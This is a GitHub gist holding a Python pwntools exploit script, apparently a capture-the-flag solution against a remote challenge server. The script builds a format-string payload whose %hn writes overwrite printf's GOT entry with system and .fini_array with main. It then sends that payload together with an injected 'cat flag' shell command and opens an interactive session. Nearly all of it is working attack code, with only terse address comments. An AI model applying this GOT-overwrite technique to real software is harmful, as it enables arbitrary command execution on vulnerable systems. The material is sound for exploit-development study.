Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
# vulnerable overwrite is at
# overwrite is at .fini_array
# 0x08049934 & 36 (half-write each)
# main location is 0x080485ED
# printf got is 0x08049a38
# system got is 0x08049a48
# system@PLT = 0x8048496
# the vulnerability is twofold:
# 1. overwrite printf with system
# 2. overwrite .fini_array[0] wth main
# 3. pass 'ls' to system
# win...
# | 12 || 13 || 14 || 15 |
out = " \x3a\x9a\x04\x08\x38\x9a\x04\x08\x36\x99\x04\x08\x34\x99\x04\x08"
# out += "%12$hn"
# out += "%14$hn"
out += "%2016x" # pad %n value to 0804
out += "%12$hn" # write 0x804 to printf@PLT
out += "%14$hn" # write 0x804 to fini_array
out += "%31890x" # pad %n value to 8496
out += "%13$hn" # write the rest of printf@PLT
out += "%343x" # pad %n value to 85ED
out += "%15$hn"
out += "\nhello || cat flag || ("
import pwn
p = pwn.remote("pwn2.chal.ctf.westerns.tokyo",16317)
print p.recv()
p.sendline(out)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.